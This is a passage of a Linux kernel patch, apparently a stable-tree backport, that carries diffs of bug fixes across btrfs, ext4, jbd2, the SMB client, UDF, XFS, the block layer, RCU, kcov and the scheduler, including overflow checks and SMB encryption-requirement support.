+ 		} else {
+ 			fault_in_iov_iter_readable(from, left);
+ 			prev_left = left;
+-			goto relock;
++			goto again;
+ 		}
+ 	}
+ 
++	btrfs_inode_unlock(inode, ilock_flags);
++
+ 	/*
+ 	 * If 'err' is -ENOTBLK or we have not written all data, then it means
+ 	 * we must fallback to buffered IO.
+@@ -1777,6 +1795,7 @@ static inline bool skip_inode_logging(const struct btrfs_log_ctx *ctx)
+  */
+ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ {
++	struct btrfs_file_private *private = file->private_data;
+ 	struct dentry *dentry = file_dentry(file);
+ 	struct inode *inode = d_inode(dentry);
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(inode->i_sb);
+@@ -1786,6 +1805,7 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 	int ret = 0, err;
+ 	u64 len;
+ 	bool full_sync;
++	const bool skip_ilock = (private ? private->fsync_skip_inode_lock : false);
+ 
+ 	trace_btrfs_sync_file(file, datasync);
+ 
+@@ -1813,7 +1833,10 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 	if (ret)
+ 		goto out;
+ 
+-	btrfs_inode_lock(inode, BTRFS_ILOCK_MMAP);
++	if (skip_ilock)
++		down_write(&BTRFS_I(inode)->i_mmap_lock);
++	else
++		btrfs_inode_lock(inode, BTRFS_ILOCK_MMAP);
+ 
+ 	atomic_inc(&root->log_batch);
+ 
+@@ -1837,7 +1860,10 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 	 */
+ 	ret = start_ordered_ops(inode, start, end);
+ 	if (ret) {
+-		btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
++		if (skip_ilock)
++			up_write(&BTRFS_I(inode)->i_mmap_lock);
++		else
++			btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
+ 		goto out;
+ 	}
+ 
+@@ -1940,7 +1966,10 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 	 * file again, but that will end up using the synchronization
+ 	 * inside btrfs_sync_log to keep things safe.
+ 	 */
+-	btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
++	if (skip_ilock)
++		up_write(&BTRFS_I(inode)->i_mmap_lock);
++	else
++		btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
+ 
+ 	if (ret == BTRFS_NO_LOG_SYNC) {
+ 		ret = btrfs_end_transaction(trans);
+@@ -2008,7 +2037,10 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 
+ out_release_extents:
+ 	btrfs_release_log_ctx_extents(&ctx);
+-	btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
++	if (skip_ilock)
++		up_write(&BTRFS_I(inode)->i_mmap_lock);
++	else
++		btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
+ 	goto out;
+ }
+ 
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 76d52d682b3b0..21d262da386d5 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -865,6 +865,7 @@ static int __load_free_space_cache(struct btrfs_root *root, struct inode *inode,
+ 				spin_unlock(&ctl->tree_lock);
+ 				btrfs_err(fs_info,
+ 					"Duplicate entries in free space cache, dumping");
++				kmem_cache_free(btrfs_free_space_bitmap_cachep, e->bitmap);
+ 				kmem_cache_free(btrfs_free_space_cachep, e);
+ 				goto free_cache;
+ 			}
+diff --git a/fs/btrfs/print-tree.c b/fs/btrfs/print-tree.c
+index 228eeb04d03d3..144b7bd05346e 100644
+--- a/fs/btrfs/print-tree.c
++++ b/fs/btrfs/print-tree.c
+@@ -9,7 +9,7 @@
+ 
+ struct root_name_map {
+ 	u64 id;
+-	char name[16];
++	const char *name;
+ };
+ 
+ static const struct root_name_map root_map[] = {
+diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
+index 3a91be1d9bbe7..ee9d2faa5218f 100644
+--- a/fs/ext4/inline.c
++++ b/fs/ext4/inline.c
+@@ -1439,7 +1439,11 @@ int ext4_inlinedir_to_tree(struct file *dir_file,
+ 			hinfo->hash = EXT4_DIRENT_HASH(de);
+ 			hinfo->minor_hash = EXT4_DIRENT_MINOR_HASH(de);
+ 		} else {
+-			ext4fs_dirhash(dir, de->name, de->name_len, hinfo);
++			err = ext4fs_dirhash(dir, de->name, de->name_len, hinfo);
++			if (err) {
++				ret = err;
++				goto out;
++			}
+ 		}
+ 		if ((hinfo->hash < start_hash) ||
+ 		    ((hinfo->hash == start_hash) &&
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 71ce3ed5ab6ba..004ad321a45d6 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -2226,8 +2226,7 @@ int ext4_mb_find_by_goal(struct ext4_allocation_context *ac,
+ 	if (max >= ac->ac_g_ex.fe_len && ac->ac_g_ex.fe_len == sbi->s_stripe) {
+ 		ext4_fsblk_t start;
+ 
+-		start = ext4_group_first_block_no(ac->ac_sb, e4b->bd_group) +
+-			ex.fe_start;
++		start = ext4_grp_offs_to_block(ac->ac_sb, &ex);
+ 		/* use do_div to get remainder (would be 64-bit modulo) */
+ 		if (do_div(start, sbi->s_stripe) == 0) {
+ 			ac->ac_found++;
+diff --git a/fs/jbd2/journal.c b/fs/jbd2/journal.c
+index b136b46b63bc9..c8d59f7c47453 100644
+--- a/fs/jbd2/journal.c
++++ b/fs/jbd2/journal.c
+@@ -409,6 +409,7 @@ int jbd2_journal_write_metadata_buffer(transaction_t *transaction,
+ 		tmp = jbd2_alloc(bh_in->b_size, GFP_NOFS);
+ 		if (!tmp) {
+ 			brelse(new_bh);
++			free_buffer_head(new_bh);
+ 			return -ENOMEM;
+ 		}
+ 		spin_lock(&jh_in->b_state_lock);
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+index a2afdf9c5f80b..0c0a7fcc4cebc 100644
+--- a/fs/smb/client/cifs_debug.c
++++ b/fs/smb/client/cifs_debug.c
+@@ -960,7 +960,7 @@ static int cifs_security_flags_proc_open(struct inode *inode, struct file *file)
+ static void
+ cifs_security_flags_handle_must_flags(unsigned int *flags)
+ {
+-	unsigned int signflags = *flags & CIFSSEC_MUST_SIGN;
++	unsigned int signflags = *flags & (CIFSSEC_MUST_SIGN | CIFSSEC_MUST_SEAL);
+ 
+ 	if ((*flags & CIFSSEC_MUST_KRB5) == CIFSSEC_MUST_KRB5)
+ 		*flags = CIFSSEC_MUST_KRB5;
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 1564febd1439f..7b702b3cf7b87 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -1820,7 +1820,7 @@ static inline bool is_retryable_error(int error)
+ #define   CIFSSEC_MAY_SIGN	0x00001
+ #define   CIFSSEC_MAY_NTLMV2	0x00004
+ #define   CIFSSEC_MAY_KRB5	0x00008
+-#define   CIFSSEC_MAY_SEAL	0x00040 /* not supported yet */
++#define   CIFSSEC_MAY_SEAL	0x00040
+ #define   CIFSSEC_MAY_NTLMSSP	0x00080 /* raw ntlmssp with ntlmv2 */
+ 
+ #define   CIFSSEC_MUST_SIGN	0x01001
+@@ -1830,11 +1830,11 @@ require use of the stronger protocol */
+ #define   CIFSSEC_MUST_NTLMV2	0x04004
+ #define   CIFSSEC_MUST_KRB5	0x08008
+ #ifdef CONFIG_CIFS_UPCALL
+-#define   CIFSSEC_MASK          0x8F08F /* flags supported if no weak allowed */
++#define   CIFSSEC_MASK          0xCF0CF /* flags supported if no weak allowed */
+ #else
+-#define	  CIFSSEC_MASK          0x87087 /* flags supported if no weak allowed */
++#define	  CIFSSEC_MASK          0xC70C7 /* flags supported if no weak allowed */
+ #endif /* UPCALL */
+-#define   CIFSSEC_MUST_SEAL	0x40040 /* not supported yet */
++#define   CIFSSEC_MUST_SEAL	0x40040
+ #define   CIFSSEC_MUST_NTLMSSP	0x80080 /* raw ntlmssp with ntlmv2 */
+ 
+ #define   CIFSSEC_DEF (CIFSSEC_MAY_SIGN | CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_NTLMSSP | CIFSSEC_MAY_SEAL)
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index e15bf116c7558..fad4b5dcfbd5a 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -80,6 +80,9 @@ int smb3_encryption_required(const struct cifs_tcon *tcon)
+ 	if (tcon->seal &&
+ 	    (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
+ 		return 1;
++	if (((global_secflags & CIFSSEC_MUST_SEAL) == CIFSSEC_MUST_SEAL) &&
++	    (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
++		return 1;
+ 	return 0;
+ }
+ 
+diff --git a/fs/udf/balloc.c b/fs/udf/balloc.c
+index c4c18eeacb60c..aa73ab1b50a52 100644
+--- a/fs/udf/balloc.c
++++ b/fs/udf/balloc.c
+@@ -22,6 +22,7 @@
+ #include "udfdecl.h"
+ 
+ #include <linux/bitops.h>
++#include <linux/overflow.h>
+ 
+ #include "udf_i.h"
+ #include "udf_sb.h"
+@@ -144,7 +145,6 @@ static void udf_bitmap_free_blocks(struct super_block *sb,
+ {
+ 	struct udf_sb_info *sbi = UDF_SB(sb);
+ 	struct buffer_head *bh = NULL;
+-	struct udf_part_map *partmap;
+ 	unsigned long block;
+ 	unsigned long block_group;
+ 	unsigned long bit;
+@@ -153,19 +153,9 @@ static void udf_bitmap_free_blocks(struct super_block *sb,
+ 	unsigned long overflow;
+ 
+ 	mutex_lock(&sbi->s_alloc_mutex);
+-	partmap = &sbi->s_partmaps[bloc->partitionReferenceNum];
+-	if (bloc->logicalBlockNum + count < count ||
+-	    (bloc->logicalBlockNum + count) > partmap->s_partition_len) {
+-		udf_debug("%u < %d || %u + %u > %u\n",
+-			  bloc->logicalBlockNum, 0,
+-			  bloc->logicalBlockNum, count,
+-			  partmap->s_partition_len);
+-		goto error_return;
+-	}
+-
++	/* We make sure this cannot overflow when mounting the filesystem */
+ 	block = bloc->logicalBlockNum + offset +
+ 		(sizeof(struct spaceBitmapDesc) << 3);
+-
+ 	do {
+ 		overflow = 0;
+ 		block_group = block >> (sb->s_blocksize_bits + 3);
+@@ -395,7 +385,6 @@ static void udf_table_free_blocks(struct super_block *sb,
+ 				  uint32_t count)
+ {
+ 	struct udf_sb_info *sbi = UDF_SB(sb);
+-	struct udf_part_map *partmap;
+ 	uint32_t start, end;
+ 	uint32_t elen;
+ 	struct kernel_lb_addr eloc;
+@@ -404,16 +393,6 @@ static void udf_table_free_blocks(struct super_block *sb,
+ 	struct udf_inode_info *iinfo;
+ 
+ 	mutex_lock(&sbi->s_alloc_mutex);
+-	partmap = &sbi->s_partmaps[bloc->partitionReferenceNum];
+-	if (bloc->logicalBlockNum + count < count ||
+-	    (bloc->logicalBlockNum + count) > partmap->s_partition_len) {
+-		udf_debug("%u < %d || %u + %u > %u\n",
+-			  bloc->logicalBlockNum, 0,
+-			  bloc->logicalBlockNum, count,
+-			  partmap->s_partition_len);
+-		goto error_return;
+-	}
+-
+ 	iinfo = UDF_I(table);
+ 	udf_add_free_space(sb, sbi->s_partition, count);
+ 
+@@ -688,6 +667,17 @@ void udf_free_blocks(struct super_block *sb, struct inode *inode,
+ {
+ 	uint16_t partition = bloc->partitionReferenceNum;
+ 	struct udf_part_map *map = &UDF_SB(sb)->s_partmaps[partition];
++	uint32_t blk;
++
++	if (check_add_overflow(bloc->logicalBlockNum, offset, &blk) ||
++	    check_add_overflow(blk, count, &blk) ||
++	    bloc->logicalBlockNum + count > map->s_partition_len) {
++		udf_debug("Invalid request to free blocks: (%d, %u), off %u, "
++			  "len %u, partition len %u\n",
++			  partition, bloc->logicalBlockNum, offset, count,
++			  map->s_partition_len);
++		return;
++	}
+ 
+ 	if (map->s_partition_flags & UDF_PART_FLAG_UNALLOC_BITMAP) {
+ 		udf_bitmap_free_blocks(sb, map->s_uspace.s_bitmap,
+diff --git a/fs/xfs/xfs_log_recover.c b/fs/xfs/xfs_log_recover.c
+index 322eb2ee6c550..05e48523ea400 100644
+--- a/fs/xfs/xfs_log_recover.c
++++ b/fs/xfs/xfs_log_recover.c
+@@ -2960,7 +2960,7 @@ xlog_do_recovery_pass(
+ 	int			error = 0, h_size, h_len;
+ 	int			error2 = 0;
+ 	int			bblks, split_bblks;
+-	int			hblks, split_hblks, wrapped_hblks;
++	int			hblks = 1, split_hblks, wrapped_hblks;
+ 	int			i;
+ 	struct hlist_head	rhash[XLOG_RHASH_SIZE];
+ 	LIST_HEAD		(buffer_list);
+@@ -3016,14 +3016,22 @@ xlog_do_recovery_pass(
+ 		if (error)
+ 			goto bread_err1;
+ 
+-		hblks = xlog_logrec_hblks(log, rhead);
+-		if (hblks != 1) {
+-			kmem_free(hbp);
+-			hbp = xlog_alloc_buffer(log, hblks);
++		/*
++		 * This open codes xlog_logrec_hblks so that we can reuse the
++		 * fixed up h_size value calculated above.  Without that we'd
++		 * still allocate the buffer based on the incorrect on-disk
++		 * size.
++		 */
++		if (h_size > XLOG_HEADER_CYCLE_SIZE &&
++		    (rhead->h_version & cpu_to_be32(XLOG_VERSION_2))) {
++			hblks = DIV_ROUND_UP(h_size, XLOG_HEADER_CYCLE_SIZE);
++			if (hblks > 1) {
++				kmem_free(hbp);
++				hbp = xlog_alloc_buffer(log, hblks);
++			}
+ 		}
+ 	} else {
+ 		ASSERT(log->l_sectBBsize == 1);
+-		hblks = 1;
+ 		hbp = xlog_alloc_buffer(log, 1);
+ 		h_size = XLOG_BIG_RECORD_BSIZE;
+ 	}
+diff --git a/include/linux/blk-integrity.h b/include/linux/blk-integrity.h
+index 378b2459efe2d..f7cc8080672cc 100644
+--- a/include/linux/blk-integrity.h
++++ b/include/linux/blk-integrity.h
+@@ -105,14 +105,13 @@ static inline bool blk_integrity_rq(struct request *rq)
+ }
+ 
+ /*
+- * Return the first bvec that contains integrity data.  Only drivers that are
+- * limited to a single integrity segment should use this helper.
++ * Return the current bvec that contains the integrity data. bip_iter may be
++ * advanced to iterate over the integrity data.
+  */
+-static inline struct bio_vec *rq_integrity_vec(struct request *rq)
++static inline struct bio_vec rq_integrity_vec(struct request *rq)
+ {
+-	if (WARN_ON_ONCE(queue_max_integrity_segments(rq->q) > 1))
+-		return NULL;
+-	return rq->bio->bi_integrity->bip_vec;
++	return mp_bvec_iter_bvec(rq->bio->bi_integrity->bip_vec,
++				 rq->bio->bi_integrity->bip_iter);
+ }
+ #else /* CONFIG_BLK_DEV_INTEGRITY */
+ static inline int blk_rq_count_integrity_sg(struct request_queue *q,
+@@ -176,9 +175,10 @@ static inline int blk_integrity_rq(struct request *rq)
+ 	return 0;
+ }
+ 
+-static inline struct bio_vec *rq_integrity_vec(struct request *rq)
++static inline struct bio_vec rq_integrity_vec(struct request *rq)
+ {
+-	return NULL;
++	/* the optimizer will remove all calls to this function */
++	return (struct bio_vec){ };
+ }
+ #endif /* CONFIG_BLK_DEV_INTEGRITY */
+ #endif /* _LINUX_BLK_INTEGRITY_H */
+diff --git a/include/linux/clocksource.h b/include/linux/clocksource.h
+index 1d42d4b173271..0ad8b550bb4b4 100644
+--- a/include/linux/clocksource.h
++++ b/include/linux/clocksource.h
+@@ -291,7 +291,19 @@ static inline void timer_probe(void) {}
+ #define TIMER_ACPI_DECLARE(name, table_id, fn)		\
+ 	ACPI_DECLARE_PROBE_ENTRY(timer, name, table_id, 0, NULL, 0, fn)
+ 
+-extern ulong max_cswd_read_retries;
++static inline unsigned int clocksource_get_max_watchdog_retry(void)
++{
++	/*
++	 * When system is in the boot phase or under heavy workload, there
++	 * can be random big latencies during the clocksource/watchdog
++	 * read, so allow retries to filter the noise latency. As the
++	 * latency's frequency and maximum value goes up with the number of
++	 * CPUs, scale the number of retries with the number of online
++	 * CPUs.
++	 */
++	return (ilog2(num_online_cpus()) / 2) + 1;
++}
++
+ void clocksource_verify_percpu(struct clocksource *cs);
+ 
+ #endif /* _LINUX_CLOCKSOURCE_H */
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 2c1371320c295..f680897794fa2 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -2109,6 +2109,8 @@
+ 
+ #define PCI_VENDOR_ID_CHELSIO		0x1425
+ 
++#define PCI_VENDOR_ID_EDIMAX		0x1432
++
+ #define PCI_VENDOR_ID_ADLINK		0x144a
+ 
+ #define PCI_VENDOR_ID_SAMSUNG		0x144d
+diff --git a/include/linux/profile.h b/include/linux/profile.h
+index 11db1ec516e27..12da750a88a04 100644
+--- a/include/linux/profile.h
++++ b/include/linux/profile.h
+@@ -11,7 +11,6 @@
+ 
+ #define CPU_PROFILING	1
+ #define SCHED_PROFILING	2
+-#define SLEEP_PROFILING	3
+ #define KVM_PROFILING	4
+ 
+ struct proc_dir_entry;
+diff --git a/include/linux/trace_events.h b/include/linux/trace_events.h
+index c8b5e9781d01a..f70624ec4188f 100644
+--- a/include/linux/trace_events.h
++++ b/include/linux/trace_events.h
+@@ -847,7 +847,6 @@ do {									\
+ struct perf_event;
+ 
+ DECLARE_PER_CPU(struct pt_regs, perf_trace_regs);
+-DECLARE_PER_CPU(int, bpf_kprobe_override);
+ 
+ extern int  perf_trace_init(struct perf_event *event);
+ extern void perf_trace_destroy(struct perf_event *event);
+diff --git a/include/net/ip6_route.h b/include/net/ip6_route.h
+index 035d61d50a989..4cd0839c86c92 100644
+--- a/include/net/ip6_route.h
++++ b/include/net/ip6_route.h
+@@ -132,18 +132,26 @@ void rt6_age_exceptions(struct fib6_info *f6i, struct fib6_gc_args *gc_args,
+ 
+ static inline int ip6_route_get_saddr(struct net *net, struct fib6_info *f6i,
+ 				      const struct in6_addr *daddr,
+-				      unsigned int prefs,
++				      unsigned int prefs, int l3mdev_index,
+ 				      struct in6_addr *saddr)
+ {
++	struct net_device *l3mdev;
++	struct net_device *dev;
++	bool same_vrf;
+ 	int err = 0;
+ 
+-	if (f6i && f6i->fib6_prefsrc.plen) {
++	rcu_read_lock();
++
++	l3mdev = dev_get_by_index_rcu(net, l3mdev_index);
++	if (!f6i || !f6i->fib6_prefsrc.plen || l3mdev)
++		dev = f6i ? fib6_info_nh_dev(f6i) : NULL;
++	same_vrf = !l3mdev || l3mdev_master_dev_rcu(dev) == l3mdev;
++	if (f6i && f6i->fib6_prefsrc.plen && same_vrf)
+ 		*saddr = f6i->fib6_prefsrc.addr;
+-	} else {
+-		struct net_device *dev = f6i ? fib6_info_nh_dev(f6i) : NULL;
++	else
++		err = ipv6_dev_get_saddr(net, same_vrf ? dev : l3mdev, daddr, prefs, saddr);
+ 
+-		err = ipv6_dev_get_saddr(net, dev, daddr, prefs, saddr);
+-	}
++	rcu_read_unlock();
+ 
+ 	return err;
+ }
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 9a80d0251d8f3..e365302fed95d 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -387,7 +387,7 @@ static inline void *nft_expr_priv(const struct nft_expr *expr)
+ 	return (void *)expr->data;
+ }
+ 
+-int nft_expr_clone(struct nft_expr *dst, struct nft_expr *src);
++int nft_expr_clone(struct nft_expr *dst, struct nft_expr *src, gfp_t gfp);
+ void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr);
+ int nft_expr_dump(struct sk_buff *skb, unsigned int attr,
+ 		  const struct nft_expr *expr);
+@@ -889,7 +889,7 @@ struct nft_expr_ops {
+ 						struct nft_regs *regs,
+ 						const struct nft_pktinfo *pkt);
+ 	int				(*clone)(struct nft_expr *dst,
+-						 const struct nft_expr *src);
++						 const struct nft_expr *src, gfp_t gfp);
+ 	unsigned int			size;
+ 
+ 	int				(*init)(const struct nft_ctx *ctx,
+diff --git a/include/trace/events/intel_ifs.h b/include/trace/events/intel_ifs.h
+index d7353024016cc..af0af3f1d9b7c 100644
+--- a/include/trace/events/intel_ifs.h
++++ b/include/trace/events/intel_ifs.h
+@@ -10,25 +10,25 @@
+ 
+ TRACE_EVENT(ifs_status,
+ 
+-	TP_PROTO(int cpu, union ifs_scan activate, union ifs_status status),
++	TP_PROTO(int cpu, int start, int stop, u64 status),
+ 
+-	TP_ARGS(cpu, activate, status),
++	TP_ARGS(cpu, start, stop, status),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(	u64,	status	)
+ 		__field(	int,	cpu	)
+-		__field(	u8,	start	)
+-		__field(	u8,	stop	)
++		__field(	u16,	start	)
++		__field(	u16,	stop	)
+ 	),
+ 
+ 	TP_fast_assign(
+ 		__entry->cpu	= cpu;
+-		__entry->start	= activate.start;
+-		__entry->stop	= activate.stop;
+-		__entry->status	= status.data;
++		__entry->start	= start;
++		__entry->stop	= stop;
++		__entry->status	= status;
+ 	),
+ 
+-	TP_printk("cpu: %d, start: %.2x, stop: %.2x, status: %llx",
++	TP_printk("cpu: %d, start: %.4x, stop: %.4x, status: %.16llx",
+ 		__entry->cpu,
+ 		__entry->start,
+ 		__entry->stop,
+diff --git a/kernel/irq/irqdesc.c b/kernel/irq/irqdesc.c
+index fd09962744014..5b173b79051cd 100644
+--- a/kernel/irq/irqdesc.c
++++ b/kernel/irq/irqdesc.c
+@@ -493,6 +493,7 @@ static int alloc_descs(unsigned int start, unsigned int cnt, int node,
+ 				flags = IRQD_AFFINITY_MANAGED |
+ 					IRQD_MANAGED_SHUTDOWN;
+ 			}
++			flags |= IRQD_AFFINITY_SET;
+ 			mask = &affinity->mask;
+ 			node = cpu_to_node(cpumask_first(mask));
+ 			affinity++;
+diff --git a/kernel/jump_label.c b/kernel/jump_label.c
+index eec802175ccc6..1ed269b2c4035 100644
+--- a/kernel/jump_label.c
++++ b/kernel/jump_label.c
+@@ -231,7 +231,7 @@ void static_key_disable_cpuslocked(struct static_key *key)
+ 	}
+ 
+ 	jump_label_lock();
+-	if (atomic_cmpxchg(&key->enabled, 1, 0))
++	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
+ 		jump_label_update(key);
+ 	jump_label_unlock();
+ }
+@@ -284,7 +284,7 @@ static void __static_key_slow_dec_cpuslocked(struct static_key *key)
+ 		return;
+ 
+ 	guard(mutex)(&jump_label_mutex);
+-	if (atomic_cmpxchg(&key->enabled, 1, 0))
++	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
+ 		jump_label_update(key);
+ 	else
+ 		WARN_ON_ONCE(!static_key_slow_try_dec(key));
+diff --git a/kernel/kcov.c b/kernel/kcov.c
+index fe3308dfd6a73..9413f27294ca1 100644
+--- a/kernel/kcov.c
++++ b/kernel/kcov.c
+@@ -161,6 +161,15 @@ static void kcov_remote_area_put(struct kcov_remote_area *area,
+ 	kmsan_unpoison_memory(&area->list, sizeof(area->list));
+ }
+ 
++/*
++ * Unlike in_serving_softirq(), this function returns false when called during
++ * a hardirq or an NMI that happened in the softirq context.
++ */
++static inline bool in_softirq_really(void)
++{
++	return in_serving_softirq() && !in_hardirq() && !in_nmi();
++}
++
+ static notrace bool check_kcov_mode(enum kcov_mode needed_mode, struct task_struct *t)
+ {
+ 	unsigned int mode;
+@@ -170,7 +179,7 @@ static notrace bool check_kcov_mode(enum kcov_mode needed_mode, struct task_stru
+ 	 * so we ignore code executed in interrupts, unless we are in a remote
+ 	 * coverage collection section in a softirq.
+ 	 */
+-	if (!in_task() && !(in_serving_softirq() && t->kcov_softirq))
++	if (!in_task() && !(in_softirq_really() && t->kcov_softirq))
+ 		return false;
+ 	mode = READ_ONCE(t->kcov_mode);
+ 	/*
+@@ -847,7 +856,7 @@ void kcov_remote_start(u64 handle)
+ 
+ 	if (WARN_ON(!kcov_check_handle(handle, true, true, true)))
+ 		return;
+-	if (!in_task() && !in_serving_softirq())
++	if (!in_task() && !in_softirq_really())
+ 		return;
+ 
+ 	local_lock_irqsave(&kcov_percpu_data.lock, flags);
+@@ -989,7 +998,7 @@ void kcov_remote_stop(void)
+ 	int sequence;
+ 	unsigned long flags;
+ 
+-	if (!in_task() && !in_serving_softirq())
++	if (!in_task() && !in_softirq_really())
+ 		return;
+ 
+ 	local_lock_irqsave(&kcov_percpu_data.lock, flags);
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 5b5ee060a2db5..4c4fc4d309b8b 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -1552,8 +1552,8 @@ static bool is_cfi_preamble_symbol(unsigned long addr)
+ 	if (lookup_symbol_name(addr, symbuf))
+ 		return false;
+ 
+-	return str_has_prefix("__cfi_", symbuf) ||
+-		str_has_prefix("__pfx_", symbuf);
++	return str_has_prefix(symbuf, "__cfi_") ||
++		str_has_prefix(symbuf, "__pfx_");
+ }
+ 
+ static int check_kprobe_address_safe(struct kprobe *p,
+diff --git a/kernel/padata.c b/kernel/padata.c
+index 0261bced7eb6e..11270ffca54e0 100644
+--- a/kernel/padata.c
++++ b/kernel/padata.c
+@@ -508,6 +508,13 @@ void __init padata_do_multithreaded(struct padata_mt_job *job)
+ 	ps.chunk_size = max(ps.chunk_size, job->min_chunk);
+ 	ps.chunk_size = roundup(ps.chunk_size, job->align);
+ 
++	/*
++	 * chunk_size can be 0 if the caller sets min_chunk to 0. So force it
++	 * to at least 1 to prevent divide-by-0 panic in padata_mt_helper().`
++	 */
++	if (!ps.chunk_size)
++		ps.chunk_size = 1U;
++
+ 	list_for_each_entry(pw, &works, pw_list)
+ 		queue_work(system_unbound_wq, &pw->pw_work);
+ 
+diff --git a/kernel/profile.c b/kernel/profile.c
+index 8a77769bc4b4c..984f819b701c9 100644
+--- a/kernel/profile.c
++++ b/kernel/profile.c
+@@ -57,20 +57,11 @@ static DEFINE_MUTEX(profile_flip_mutex);
+ int profile_setup(char *str)
+ {
+ 	static const char schedstr[] = "schedule";
+-	static const char sleepstr[] = "sleep";
+ 	static const char kvmstr[] = "kvm";
+ 	const char *select = NULL;
+ 	int par;
+ 
+-	if (!strncmp(str, sleepstr, strlen(sleepstr))) {
+-#ifdef CONFIG_SCHEDSTATS
+-		force_schedstat_enabled();
+-		prof_on = SLEEP_PROFILING;
+-		select = sleepstr;
+-#else
+-		pr_warn("kernel sleep profiling requires CONFIG_SCHEDSTATS\n");
+-#endif /* CONFIG_SCHEDSTATS */
+-	} else if (!strncmp(str, schedstr, strlen(schedstr))) {
++	if (!strncmp(str, schedstr, strlen(schedstr))) {
+ 		prof_on = SCHED_PROFILING;
+ 		select = schedstr;
+ 	} else if (!strncmp(str, kvmstr, strlen(kvmstr))) {
+diff --git a/kernel/rcu/rcutorture.c b/kernel/rcu/rcutorture.c
+index 8c45df910763a..c14517912cfaa 100644
+--- a/kernel/rcu/rcutorture.c
++++ b/kernel/rcu/rcutorture.c
+@@ -2547,7 +2547,7 @@ static void rcu_torture_fwd_cb_cr(struct rcu_head *rhp)
+ 	spin_lock_irqsave(&rfp->rcu_fwd_lock, flags);
+ 	rfcpp = rfp->rcu_fwd_cb_tail;
+ 	rfp->rcu_fwd_cb_tail = &rfcp->rfc_next;
+-	WRITE_ONCE(*rfcpp, rfcp);
++	smp_store_release(rfcpp, rfcp);
+ 	WRITE_ONCE(rfp->n_launders_cb, rfp->n_launders_cb + 1);
+ 	i = ((jiffies - rfp->rcu_fwd_startat) / (HZ / FWD_CBS_HIST_DIV));
+ 	if (i >= ARRAY_SIZE(rfp->n_launders_hist))
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 61f9503a5fe9c..cd6144cea5a1a 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -4391,11 +4391,15 @@ void rcutree_migrate_callbacks(int cpu)
+ 	struct rcu_data *rdp = per_cpu_ptr(&rcu_data, cpu);
+ 	bool needwake;
+ 
+-	if (rcu_rdp_is_offloaded(rdp) ||
+-	    rcu_segcblist_empty(&rdp->cblist))
+-		return;  /* No callbacks to migrate. */
++	if (rcu_rdp_is_offloaded(rdp))
++		return;
+ 
+ 	raw_spin_lock_irqsave(&rcu_state.barrier_lock, flags);
++	if (rcu_segcblist_empty(&rdp->cblist)) {
++		raw_spin_unlock_irqrestore(&rcu_state.barrier_lock, flags);
++		return;  /* No callbacks to migrate. */
++	}
++
+ 	WARN_ON_ONCE(rcu_rdp_cpu_online(rdp));
+ 	rcu_barrier_entrain(rdp);
+ 	my_rdp = this_cpu_ptr(&rcu_data);
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 4a96bf1d2f37c..8388575759378 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -9398,6 +9398,22 @@ static int cpuset_cpu_inactive(unsigned int cpu)
+ 	return 0;
+ }
+ 
++static inline void sched_smt_present_inc(int cpu)
++{
++#ifdef CONFIG_SCHED_SMT
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_inc_cpuslocked(&sched_smt_present);
++#endif
++}
++
++static inline void sched_smt_present_dec(int cpu)
++{
++#ifdef CONFIG_SCHED_SMT
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_dec_cpuslocked(&sched_smt_present);
++#endif
++}
++
+ int sched_cpu_activate(unsigned int cpu)
+ {
+ 	struct rq *rq = cpu_rq(cpu);
+@@ -9409,13 +9425,10 @@ int sched_cpu_activate(unsigned int cpu)
+ 	 */
+ 	balance_push_set(cpu, false);
+ 
+-#ifdef CONFIG_SCHED_SMT
+ 	/*
